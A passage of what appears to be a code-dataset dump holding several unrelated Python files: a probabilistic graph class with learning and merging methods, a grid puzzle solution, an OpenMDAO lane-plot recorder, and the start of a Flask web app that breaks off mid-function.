Optional[float] = None,\n **node_attributes) -> NodeKey:\n\n if isinstance(node, tuple):\n node_key = get_node_key(node_id=node)\n node_id = node\n else:\n node_key = node\n node_id = get_node_id(node_key=node)\n\n if timestamp is None:\n ts = time.time()\n else:\n ts = timestamp\n\n if node_key not in self.nodes:\n self.nodes[node_key] = {'_type': node_id[0],\n '_uid': node_id[1],\n '_created': ts,\n '_updated': None,\n '_edges': set(),\n '_community': None,\n '_changed': False}\n\n else:\n self.nodes[node_key]['_updated'] = ts\n self.nodes[node_key]['_changed'] = True\n\n if len(node_attributes) > 0:\n self.nodes[node_key].update(**node_attributes)\n\n # keep track of any attributes that are embedded graphs\n #\n for attr in node_attributes:\n if isinstance(node_attributes[attr], AMGraph):\n if node_key not in self.embedded_graphs:\n self.embedded_graphs[node_key] = {attr}\n else:\n self.embedded_graphs[node_key].add(attr)\n\n return node_key\n\n def set_edge(self,\n triple: Union[TripleKey, TripleId],\n source_attr: Optional[dict] = None,\n target_attr: Optional[dict] = None,\n prob: float = 1.0,\n numeric: Optional[float] = None,\n audit: bool = False,\n timestamp: Optional[float] = None,\n **edge_attributes\n ):\n\n if timestamp is None:\n ts = time.time()\n else:\n ts = timestamp\n\n if isinstance(triple, tuple):\n triple_id = triple\n triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n else:\n triple_id = get_triple_id(triple_key=triple)\n triple_key = triple\n\n # keep track of edge types\n #\n self.edgeTypes.add(triple_id[1][0])\n\n # add nodes if necessary\n #\n if source_attr is not None:\n source_key = self.set_node(node=triple_id[0], timestamp=ts, **source_attr)\n else:\n source_key = self.set_node(node=triple_id[0], timestamp=ts)\n\n if target_attr is not None:\n target_key = self.set_node(node=triple_id[2], timestamp=ts, **target_attr)\n else:\n target_key = self.set_node(node=triple_id[2], timestamp=ts)\n\n if audit and triple_key in self.edges:\n\n # construct an expired triple_id\n #\n expired_triple_id = (triple_id[0], (triple_id[1][0], triple_id[1][1], ts), triple_id[2])\n expired_edge_key = get_triple_key(triple_id=expired_triple_id, directional=self.directional)\n\n # copy over attributes\n #\n self.edges[expired_edge_key] = deepcopy(self.edges[triple_key])\n\n # update the attributes\n #\n self.edges[expired_edge_key]['_changed'] = True\n self.edges[expired_edge_key]['_updated'] = ts\n self.edges[expired_edge_key]['_expired'] = ts\n add_new_edge = True\n\n elif triple_key in self.edges:\n\n add_new_edge = False\n\n # update the attributes\n #\n self.edges[triple_key]['_updated'] = ts\n self.edges[triple_key]['_changed'] = True\n self.edges[triple_key]['_prob'] = prob\n\n if numeric is not None:\n self.edges[triple_key]['_numeric'] = numeric\n\n if len(edge_attributes) > 0:\n self.edges[triple_key].updated(**edge_attributes)\n else:\n add_new_edge = True\n\n # add new edge if required\n #\n if add_new_edge:\n self.edges[triple_key] = {'_type': triple_id[1][0],\n '_uid': triple_id[1][1],\n '_source': source_key,\n '_target': target_key,\n '_prob': prob,\n '_numeric': numeric,\n '_created': ts,\n '_updated': None,\n '_expired': None,\n '_changed': False}\n\n if len(edge_attributes) > 0:\n self.edges[triple_key].update(**edge_attributes)\n\n # add edge to nodes\n #\n self.nodes[source_key]['_edges'].add(triple_key)\n if not self.directional:\n self.nodes[target_key]['_edges'].add(triple_key)\n\n return triple_key\n\n def remove_edge(self,\n triple: Union[TripleKey, TripleId],\n audit: bool = False):\n\n if isinstance(triple, tuple):\n triple_id = triple\n triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n else:\n triple_id = get_triple_id(triple_key=triple)\n triple_key = triple\n\n if triple_key in self.edges:\n\n if audit:\n ts = time.time()\n\n # construct an expired triple_id\n #\n expired_triple_id = (triple_id[0], (triple_id[1][0], triple_id[1][1], ts), triple_id[2])\n expired_edge_key = get_triple_key(triple_id=expired_triple_id, directional=self.directional)\n\n self.edges[expired_edge_key] = deepcopy(self.edges[triple_key])\n self.edges[expired_edge_key]['_changed'] = True\n self.edges[expired_edge_key]['_updated'] = ts\n self.edges[expired_edge_key]['_expired'] = ts\n\n # remove edge from nodes\n #\n self.nodes[self.edges[triple_key]['_source']]['_edges'].discard(triple_key)\n if not self.directional:\n self.nodes[self.edges[triple_key]['_target']]['_edges'].discard(triple_key)\n \n # delete the edge\n #\n del self.edges[triple_key]\n\n # delete edgeType entry if all edges have been removed\n #\n if not audit and sum([1 for t_key in self.edges if self.edges[t_key]['_type'] == triple_id[1][0]]) == 0:\n self.edgeTypes.discard(triple_id[1][0])\n\n def remove_node(self, node: Union[NodeKey, NodeId]):\n\n if isinstance(node, tuple):\n node_key = get_node_key(node_id=node)\n else:\n node_key = node\n\n if node_key in self.nodes:\n\n # first delete any edges node has\n #\n triple_keys = list(self.nodes[node_key]['_edges'])\n for triple_key in triple_keys:\n self.remove_edge(triple=triple_key, audit=False)\n\n del self.nodes[node_key]\n\n if node_key in self.embedded_graphs:\n del self.embedded_graphs[node_key]\n\n def compare_graph(self, graph_to_compare=None, compare_edge_types: Optional[Set[EdgeType]] = None) -> Tuple[float, Por]:\n\n distance: float = 0.0\n numeric_dist: float\n prob_dist: float\n\n por: Por = {}\n\n # if graph_to_compare is None then set to an empty graph\n #\n if graph_to_compare is None:\n graph_to_compare = AMGraph()\n\n if compare_edge_types is not None:\n\n # get the edges to compare - ie the edge type is in compare_edge_types and edge is not expired\n #\n triples_to_compare = ({triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_type'] in compare_edge_types and self.edges[triple_key]['_expired'] is None} |\n {triple_key\n for triple_key in graph_to_compare.edges\n if graph_to_compare.edges[triple_key]['_type'] in compare_edge_types and graph_to_compare.edges[triple_key]['_expired'] is None})\n else:\n triples_to_compare = ({triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_expired'] is None} |\n {triple_key\n for triple_key in graph_to_compare.edges\n if graph_to_compare.edges[triple_key]['_expired'] is None})\n\n for triple_key in triples_to_compare:\n\n # default numeric_dist in case edge numeric is None\n #\n numeric_dist = 0.0\n\n # if edge in both graphs\n #\n if triple_key in self.edges and triple_key in graph_to_compare.edges:\n prob_dist = abs(self.edges[triple_key]['_prob'] - graph_to_compare.edges[triple_key]['_prob'])\n\n if self.edges[triple_key]['_numeric'] is not None and graph_to_compare.edges[triple_key]['_numeric'] is not None:\n numeric_dist = abs(self.edges[triple_key]['_numeric'] - graph_to_compare.edges[triple_key]['_numeric'])\n\n # if edge only in this graph\n #\n elif triple_key in self.edges:\n prob_dist = self.edges[triple_key]['_prob']\n\n if self.edges[triple_key]['_numeric'] is not None:\n numeric_dist = self.edges[triple_key]['_numeric']\n\n # if edge only in graph_to_compare\n #\n else:\n prob_dist = graph_to_compare.edges[triple_key]['_prob']\n\n if graph_to_compare.edges[triple_key]['_numeric'] is not None:\n numeric_dist = graph_to_compare.edges[triple_key]['_numeric']\n\n por[triple_key] = {'prob': prob_dist, 'numeric': numeric_dist}\n\n distance += pow(prob_dist, 2)\n\n distance += pow(numeric_dist, 2)\n\n distance = sqrt(distance)\n\n return distance, por\n\n def learn_graph(self, graph_to_learn=None, learn_rate: float = 1.0, learn_edge_types: Optional[Set[EdgeType]] = None, prune_threshold: float = 0.1, audit: bool = False):\n\n # if graph_to_lean is None then set to an empty graph\n #\n if graph_to_learn is None:\n graph_to_learn = AMGraph()\n\n if learn_edge_types is not None:\n\n # get the edges to compare - ie the edge type is in compare_edge_types and edge is not expired\n #\n exist_triples_to_learn = {triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_type'] in learn_edge_types and self.edges[triple_key]['_expired'] is None}\n triples_to_learn = (exist_triples_to_learn |\n {triple_key\n for triple_key in graph_to_learn.edges\n if graph_to_learn.edges[triple_key]['_type'] in learn_edge_types and graph_to_learn.edges[triple_key]['_expired'] is None})\n else:\n exist_triples_to_learn = {triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_expired'] is None}\n triples_to_learn = (exist_triples_to_learn |\n {triple_key\n for triple_key in graph_to_learn.edges\n if graph_to_learn.edges[triple_key]['_expired'] is None})\n\n # if no existing edges to learn then override learn rate to maximum (1.0)\n #\n if len(triples_to_learn) == 0:\n learn_rate = 1.0\n\n if audit:\n ts = time.time()\n else:\n ts = None\n\n triples_to_prune = set()\n\n for triple_key in triples_to_learn:\n\n # if edge in both graphs\n #\n if triple_key in self.edges and triple_key in graph_to_learn.edges:\n\n prob = self.edges[triple_key]['_prob'] + ((graph_to_learn.edges[triple_key]['_prob'] - self.edges[triple_key]['_prob']) * learn_rate)\n\n numeric = None\n\n if prob > prune_threshold:\n\n if self.edges[triple_key]['_numeric'] is not None and graph_to_learn.edges[triple_key]['_numeric'] is not None:\n numeric = self.edges[triple_key]['_numeric'] + ((graph_to_learn.edges[triple_key]['_numeric'] - self.edges[triple_key]['_numeric']) * learn_rate)\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n else:\n triples_to_prune.add(triple_key)\n\n # if edge only in this graph\n #\n elif triple_key in self.edges:\n\n prob = self.edges[triple_key]['_prob'] + ((0.0 - self.edges[triple_key]['_prob']) * learn_rate)\n\n numeric = None\n\n if prob > prune_threshold:\n\n if self.edges[triple_key]['_numeric'] is not None:\n numeric = self.edges[triple_key]['_numeric'] + ((0.0 - self.edges[triple_key]['_numeric']) * learn_rate)\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n else:\n triples_to_prune.add(triple_key)\n\n # if edge only in graph_to_learn\n #\n else:\n prob = (graph_to_learn.edges[triple_key]['_prob']) * learn_rate\n\n numeric = None\n\n if prob > prune_threshold:\n\n if graph_to_learn.edges[triple_key]['_numeric'] is not None:\n numeric = graph_to_learn.edges[triple_key]['_numeric'] * learn_rate\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n # now copy over triples not learnt and not expired\n #\n if learn_edge_types is not None:\n triples_to_copy = {triple_key\n for triple_key in graph_to_learn.edges\n if graph_to_learn.edges[triple_key]['_type'] not in learn_edge_types and graph_to_learn.edges[triple_key]['_expired'] is None}\n\n for triple_key in triples_to_copy:\n\n prob = graph_to_learn.edges[triple_key]['_prob'] * learn_rate\n\n if graph_to_learn.edges[triple_key]['_numeric'] is not None:\n numeric = graph_to_learn.edges[triple_key]['_numeric'] * learn_rate\n else:\n numeric = None\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n # now prune triples\n #\n for triple_key in triples_to_prune:\n self.remove_edge(triple=triple_key, audit=audit)\n\n def learn_edge(self, triple: Union[TripleKey, TripleId], learn_rate, numeric: Optional[float] = None, prune_threshold: float = 0.0, audit: bool = False) -> TripleKey:\n\n if isinstance(triple, tuple):\n triple_id = triple\n triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n else:\n triple_id = get_triple_id(triple_key=triple)\n triple_key = triple\n\n source_key = get_node_key(node_id=triple_id[0])\n if source_key not in self.nodes:\n self.set_edge(triple=triple, prob=1.0, numeric=numeric, audit=audit)\n else:\n triples_to_process = {existing_triple_key\n for existing_triple_key in self.nodes[source_key]['_edges']\n if self.edges[existing_triple_key]['_type'] == triple_id[1][0] and self.edges[existing_triple_key]['_expired'] is None}\n\n triples_to_process.add(triple_key)\n triples_to_prune = set()\n\n for triple_key_to_process in triples_to_process:\n if triple_key_to_process != triple_key:\n\n # weaken the probability of this edge and reduce numeric closer to 0.0\n #\n existing_prob = self.edges[triple_key_to_process]['_prob'] + ((0.0 - self.edges[triple_key_to_process]['_prob']) * learn_rate)\n\n if existing_prob > prune_threshold:\n if self.edges[triple_key_to_process]['_numeric'] is not None:\n existing_numeric = self.edges[triple_key_to_process]['_numeric'] + ((0.0 - self.edges[triple_key_to_process]['_numeric']) * learn_rate)\n else:\n existing_numeric = None\n\n self.set_edge(triple=triple_key_to_process, prob=existing_prob, numeric=existing_numeric, audit=audit)\n\n else:\n triples_to_prune.add(triple_id)\n\n else:\n if triple_key_to_process in self.edges:\n new_prob = self.edges[triple_key_to_process]['_prob'] + ((1.0 - self.edges[triple_key_to_process]['_prob']) * learn_rate)\n if numeric is not None and self.edges[triple_key_to_process]['_numeric'] is not None:\n new_numeric = self.edges[triple_key_to_process]['_numeric'] + ((numeric - self.edges[triple_key_to_process]['_numeric']) * learn_rate)\n else:\n new_numeric = numeric\n else:\n\n # if there are more than 1 in triples_to_process this means edges for the correct type already exist and prob = learn_rate\n #\n if len(triples_to_process) > 1:\n new_prob = learn_rate\n if numeric is not None:\n new_numeric = numeric * learn_rate\n else:\n new_numeric = None\n\n # else probability needs to start from 1.0\n #\n else:\n new_prob = 1.0\n new_numeric = numeric\n\n self.set_edge(triple=triple_key_to_process, prob=new_prob, numeric=new_numeric, audit=audit)\n # now prune triples\n #\n for triple_key in triples_to_prune:\n self.remove_edge(triple=triple_key, audit=audit)\n\n return triple_key\n\n def merge_graph(self, graph_to_merge, weight: float = 1.0, audit: bool = False):\n\n triples_to_merge = {triple_key\n for triple_key in graph_to_merge.edges\n if graph_to_merge.edges[triple_key]['_expired'] is None}\n\n if audit:\n ts = time.time()\n else:\n ts = None\n\n for triple_key in triples_to_merge:\n\n # if edge in both graphs\n #\n if triple_key in self.edges and triple_key in graph_to_merge.edges:\n\n prob = self.edges[triple_key]['_prob'] + (graph_to_merge.edges[triple_key]['_prob'] * weight)\n\n numeric = None\n\n if self.edges[triple_key]['_numeric'] is not None and graph_to_merge.edges[triple_key]['_numeric'] is not None:\n numeric = self.edges[triple_key]['_numeric'] + (graph_to_merge.edges[triple_key]['_numeric'] * weight)\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n # if edge only in this graph\n #\n elif triple_key in graph_to_merge.edges:\n\n prob = (graph_to_merge.edges[triple_key]['_prob']) * weight\n\n numeric = None\n\n if graph_to_merge.edges[triple_key]['_numeric'] is not None:\n numeric = graph_to_merge.edges[triple_key]['_numeric'] * weight\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n def diff_graph(self, graph_to_diff):\n\n for triple_key in graph_to_diff.edges:\n if triple_key in self.edges:\n if graph_to_diff.edges[triple_key]['_numeric'] is not None:\n if self.edges[triple_key]['_numeric'] is not None:\n self.edges[triple_key]['_numeric'] = self.edges[triple_key]['_numeric'] - graph_to_diff.edges[triple_key]['_numeric']\n else:\n self.edges[triple_key]['_numeric'] = -graph_to_diff.edges[triple_key]['_numeric']\n elif graph_to_diff.edges[triple_key]['_numeric'] is not None:\n self.set_edge(triple=triple_key, numeric=-graph_to_diff.edges[triple_key]['_numeric'])\n\n def rename_triples(self, postfix_edge_uid=None):\n\n for exist_triple_key in list(self.edges):\n\n exist_triple_id = get_triple_id(triple_key=exist_triple_key)\n new_triple = deepcopy(self.edges[exist_triple_key])\n\n new_triple['_uid'] = f'{new_triple[\"_uid\"]}_{postfix_edge_uid}'\n new_triple_id = (exist_triple_id[0], (new_triple['_type'], new_triple['_uid'], new_triple['_expired']), exist_triple_id[2])\n new_triple_key = get_triple_key(triple_id=new_triple_id, directional=self.directional)\n\n del self.edges[exist_triple_key]\n self.edges[new_triple_key] = new_triple\n\n self.nodes[new_triple['_source']]['_edges'].discard(exist_triple_key)\n self.nodes[new_triple['_source']]['_edges'].add(new_triple_key)\n if not self.directional:\n self.nodes[new_triple['_target']]['_edges'].discard(exist_triple_key)\n self.nodes[new_triple['_target']]['_edges'].add(new_triple_key)\n\n def get_sub_graphs(self, generalise: bool = False):\n sub_graphs = []\n if self.directional:\n for node_key in self.nodes:\n if len(self.nodes[node_key]['_edges']) > 0:\n graph = AMGraph(directional=True)\n\n if generalise:\n source_id = (self.nodes[node_key]['_type'], '*')\n else:\n source_id = (self.nodes[node_key]['_type'], self.nodes[node_key]['_uid'])\n\n for edge_key in self.nodes[node_key]['_edges']:\n edge_id = (self.edges[edge_key]['_type'], self.edges[edge_key]['_uid'], self.edges[edge_key]['_expired'])\n target_id = (self.nodes[self.edges[edge_key]['_target']]['_type'], self.nodes[self.edges[edge_key]['_target']]['_uid'])\n graph.set_edge(triple=(source_id, edge_id, target_id),\n prob=self.edges[edge_key]['_prob'],\n numeric=self.edges[edge_key]['_numeric'])\n sub_graphs.append((self.nodes[node_key]['_type'], graph))\n\n return sub_graphs\n\n def calc_communities(self, community_edge_type: EdgeType, weight_field='_numeric', inverse=False):\n if len(self.edges) > 1:\n nx_graph = nx.MultiGraph()\n distances = [self.edges[triple_key][weight_field] for triple_key in self.edges if self.edges[triple_key]['_type'] == community_edge_type]\n min_distance = min(distances)\n max_distance = max(distances)\n for triple_key in self.edges:\n if self.edges[triple_key]['_type'] == community_edge_type and self.edges[triple_key]['_expired'] is None:\n weight = (self.edges[triple_key][weight_field] - min_distance) / (max_distance - min_distance)\n if inverse:\n weight = 1 - weight\n nx_graph.add_edge(self.edges[triple_key]['_source'], self.edges[triple_key]['_target'], weight=weight)\n\n communities = list(nx.algorithms.community.greedy_modularity_communities(nx_graph, weight='weight'))\n for c_idx in range(len(communities)):\n for node_key in communities[c_idx]:\n self.nodes[node_key]['_community'] = c_idx\n\n\nif __name__ == '__main__':\n\n from src.normalise_amgraph import NormaliseAMGraph\n\n g1 = AMGraph(directional=True)\n g1.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200)\n\n g1.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=False)\n\n g1.remove_node(node=('A', '1'))\n\n g1.remove_node(node=('B', '2'))\n\n g1.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200, audit=True)\n\n g1.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), muneric=400, audit=True)\n\n g1.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=True)\n\n g2 = AMGraph(directional=False)\n\n g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200)\n\n g2.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=False)\n\n g2.remove_node(node=('A', '1'))\n\n g2.remove_node(node=('B', '2'))\n\n g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200, audit=True)\n\n g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=400, audit=True)\n\n g2.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=True)\n\n g3 = AMGraph(directional=True)\n\n g3.set_edge(triple=(('TRADE', '*'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n g3.set_edge(triple=(('TRADE', '*'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n g3.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=100)\n\n g4 = AMGraph(directional=True)\n\n g4.set_edge(triple=(('TRADE', '*'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n g4.set_edge(triple=(('TRADE', '*'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n g4.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=200)\n\n normaliser = NormaliseAMGraph()\n g3n, new_min_max = normaliser.normalise(graph=g3)\n g4n, new_min_max = normaliser.normalise(graph=g4)\n\n distance = g3n.compare_graph(graph_to_compare=g4n)\n\n g3n1 = AMGraph(graph=g3n)\n\n g3n1.learn_graph(graph_to_learn=g4n, learn_rate=0.7)\n g3n1d = normaliser.denormalise(graph=g3n1)\n\n g3n1.learn_graph(graph_to_learn=g4n, learn_rate=0.7)\n g3n1d = normaliser.denormalise(graph=g3n1)\n\n g5 = AMGraph()\n g5.merge_graph(graph_to_merge=g3n, weight=0.5)\n g5d = normaliser.denormalise(graph=g5)\n\n g5.merge_graph(graph_to_merge=g4n, weight=0.5)\n g5d = normaliser.denormalise(graph=g5)\n\n g6 = AMGraph()\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '2')), learn_rate=0.7)\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '2')), learn_rate=0.7)\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '3')), learn_rate=0.7)\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '3')), learn_rate=0.7)\n\n g7 = AMGraph(directional=True)\n g7.set_edge(triple=(('TRADE', '1'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n g7.set_edge(triple=(('TRADE', '1'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n g7.set_edge(triple=(('PLATFORM', 'A'), ('HAS_CHANNEL', None, None), ('CHANNEL', 'Electronic')))\n\n sub_graphs = g7.get_sub_graphs()\n\n sub_graphs_g = g7.get_sub_graphs(generalise=True)\n\n g8 = AMGraph()\n g8.set_node(node=('NEURON', '1'), a_graph=g3n1)\n\n jg8n = g8.to_dict()\n jg8dn = g8.to_dict(denormaliser=normaliser)\n\n g9 = AMGraph()\n g9.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=200)\n\n stm = AMGraph(graph=g9)\n ltm = AMGraph(graph=g9)\n\n g10 = AMGraph()\n g10.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=100)\n\n stm.learn_graph(graph_to_learn=g10, learn_rate=0.7)\n ltm.learn_graph(graph_to_learn=g10, learn_rate=0.4)\n\n dg = AMGraph(graph=stm)\n dg.diff_graph(graph_to_diff=ltm)\n dg.rename_triples(postfix_edge_uid='lstm')\n\n dg.merge_graph(graph_to_merge=g10, weight=1.0)\n\n\n print('finished')\n","sub_path":"src/am_graph.py","file_name":"am_graph.py","file_ext":"py","file_size_in_byte":35777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"97447355","text":"import sys\n\nM, N = map(int, sys.stdin.readline().strip().split())\n\nmaps = []\nfor _ in range(M):\n maps.append(list(sys.stdin.readline().strip()))\n\ndx = [0, 0, 1, -1]\ndy = [1, -1, 0, 0]\n\n\ndef find(i, j):\n for k in range(4):\n if i + dx[k] < 0 or i + dx[k] >= M:\n continue\n if j + dy[k] < 0 or j + dy[k] >= N:\n continue\n\n cur = maps[i + dx[k]][j + dy[k]]\n if cur == 'S':\n print(0)\n exit()\n elif cur in ['W', 'D']:\n continue\n else:\n maps[i + dx[k]][j + dy[k]] = 'D'\n\n\nfor i in range(M):\n for j in range(N):\n if maps[i][j] == 'W':\n find(i, j)\n\nprint(1)\nfor m in maps:\n print(''.join(m))\n","sub_path":"backjoon/Graph/16956_늑대와_양.py","file_name":"16956_늑대와_양.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"394230226","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright 2017 D. de Vries\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nThis file contains the definition of the `BaseLanePlotter` class.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nimport abc\nfrom abc import abstractmethod\n\nimport matplotlib.colors as colors\nimport numpy as np\nfrom matplotlib import ticker as ticker\nfrom matplotlib.figure import Figure\nfrom openmdao.core.driver import Driver\nfrom typing import Optional\n\nfrom .base_iteration_plotter import BaseIterationPlotter\n\n\nclass BaseLanePlotter(BaseIterationPlotter):\n \"\"\"Specialized `BaseIterationPlotter` wrapping a ``lane plot`` style visualization of variables.\n\n Abstract base class enabling OpenMDAO data to be visualized using colored, horizontal lanes. Each variable to be\n visualized this way has its own lane. The x-axis corresponds to the number of iterations/function evaluations. A\n colorbar is used to indicate the value of a design variable.\n\n Attributes\n ----------\n n_vars : int\n The number variables.\n\n var_names : :obj:`list` of :obj:`str`\n List of all variable names.\n\n xs, ys, cs: :obj:`np.ndarray`\n Arrays containing the x-, y-, and color data of the figure.\n\n iter : int\n Number of the last iteration.\n\n ax : :obj:`Axes`\n Matplotlib `Axes` of the plot.\n\n max_iter : int\n Maximum number of iterations.\n\n quad : :obj:`matplotlib.collections.QuadMesh`\n Instance of `QuadMesh` that represents the actual plot.\n\n vmin, vmax : float\n Lower and upper cutoff for values along the colorbar.\n\n cmap : str\n Name of the colormap to use.\n\n norm : :obj:`colors.Normalize`, optional\n Which normalization scheme to use for the colorbar.\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n def __init__(self, vmin=0., vmax=1., cmap='viridis', norm=None):\n # type: (float, float, str, Optional[colors.Normalize]) -> None\n \"\"\"Initialize a new `BaseLanePlotter` instance.\n\n Parameters\n ----------\n vmin, vmax : float\n Lower and upper cutoff for the values along the colorbar.\n\n cmap : str('viridis')\n Name of the colormap to use for the plot.\n\n norm : :obj:`colors.Normalize`, optional\n Instance of `colors.Normalize` can be supplied to use a normalization scheme for the colorbar.\n \"\"\"\n super(BaseLanePlotter, self).__init__()\n\n self.n_vars = None\n self.var_names = None\n\n self.xs = None\n self.ys = None\n self.cs = None\n\n self.iter = 0\n self.ax = None\n self.max_iter = 1000\n\n self.quad = None\n\n self.vmin = vmin\n self.vmax = vmax\n self.cmap = cmap\n self.norm = norm\n\n def startup(self, object_requesting_recording):\n # type: (Driver) -> None\n \"\"\"Make sure this `Recorder` is attached to a `Driver` and obtain the maximum number of iterations.\n\n Parameters\n ----------\n object_requesting_recording : :obj:`Driver`\n Instance of `Driver` to which this `Recorder` is attached.\n \"\"\"\n if not isinstance(object_requesting_recording, Driver):\n raise ValueError('This Recorder should be attached to a Driver.')\n\n if 'maxiter' in object_requesting_recording.options:\n self.max_iter = object_requesting_recording.options['maxiter']\n\n super(BaseLanePlotter, self).startup(object_requesting_recording)\n\n @abstractmethod\n def init_vars(self):\n # type: () -> None\n \"\"\"Initialize the variables of the plot.\n\n This method should be implemented by subclasses such that they can control how variables are initialized.\n \"\"\"\n raise NotImplementedError\n\n def init_fig(self, fig):\n # type: (Figure) -> None\n \"\"\"Initialize the figure, setting up axes, labels, the colorbar, etc.\n\n Parameters\n ----------\n fig : :obj:`Figure`\n Instance of the `Figure` which should be populated.\n \"\"\"\n self.init_vars()\n\n self.xs, self.ys = np.meshgrid(np.arange(0., self.max_iter+.5)-.5, np.arange(0., self.n_vars+.5)-.5)\n self.cs = np.zeros((self.n_vars, self.max_iter))\n\n self.ax = fig.add_subplot(111)\n self.ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))\n self.ax.yaxis.set_ticks(np.arange(0, self.n_vars))\n self.ax.yaxis.set_ticklabels(self.var_names)\n\n self.ax.set_xlim([-.5, .5])\n self.ax.set_ylim([-.5, self.n_vars-.5])\n self.quad = self.ax.pcolormesh(self.xs, self.ys, self.cs,\n vmin=self.vmin, vmax=self.vmax, cmap=self.cmap, norm=self.norm)\n\n fig.colorbar(self.quad)\n\n self.ax.set_xlabel('Evaluation #')\n\n @abstractmethod\n def _compute_new_data(self, desvars, responses, objectives, constraints, metadata):\n # type: (dict, dict, dict, dict, dict) -> np.ndarray\n \"\"\"Return a 1D numpy.ndarray containing the new data points.\n\n Parameters\n ----------\n desvars, responses, objectives, constraints, metadata : dict\n Dictionaries of the new design, response, objective, and constraint variables, as well as metadata.\n\n Returns\n -------\n np.ndarray\n A 1D numpy array containing the new data.\n \"\"\"\n raise NotImplementedError\n\n def _update_plot(self, *args):\n # type: (dict, dict, dict, dict, dict) -> None\n \"\"\"Insert the new data into the plot and refresh it.\n\n Parameters\n ----------\n desvars, responses, objectives, constraints, metadata : dict\n Dictionaries of the new design, response, objective, and constraint variables, as well as metadata.\n \"\"\"\n if len(args) != 5 and not any([isinstance(arg, dict) for arg in args]):\n raise ValueError('Illegal arguments for _update_plot of %s' % self.__name__)\n desvars, responses, objectives, constraints, metadata = args\n\n data = self._compute_new_data(desvars, responses, objectives, constraints, metadata)\n self.cs[:, self.iter] = data[:]\n self.quad.set_array(self.cs.ravel())\n self.ax.set_xlim([-.5, self.iter+.5])\n self.iter += 1\n","sub_path":"openlego/recorders/base_lane_plotter.py","file_name":"base_lane_plotter.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"365485417","text":"#!/usr/bin/python3.5\n# coding: utf-8\n\n\"\"\"\n\n Author : github/TonyChg\n Purpose :\n Usage :\n Example :\n\n\"\"\"\n\nimport urllib\nimport requests\nimport mysql.connector\nimport threading\nfrom database import Database\n\nfrom passlib.hash import argon2\nfrom flask import Flask, render_template, g, redirect, \\\n url_for, request, abort, session\n\nfrom status import Status\nfrom datetime import datetime\n\ntry:\n app = Flask(__name__)\n app.config.from_object('config')\n database = Database(\n app.config['DATABASE_HOST'],\n app.config['DATABASE_USER'],\n app.config['DATABASE_PASSWORD'],\n app.config['DATABASE_NAME']\n )\nexcept Exception as e:\n print(e)\n print(\"Fail to start. exiting\")\n exit(1)\n\ndef validate_url(url):\n try:\n result = urllib.parse.urlparse(url)\n if result.scheme != 'http' and result.scheme != 'https':\n raise ValueError\n return True\n except:\n return False\n\ndef request_to_dict(keys):\n entity = []\n for key in keys:\n entity.append((key, request.form.get(key)))\n return dict(entity)\n\ndef human_timestamp(timestamp):\n time = datetime.strptime(str(timestamp), \"%Y-%m-%d %H:%M:%S\")\n delta 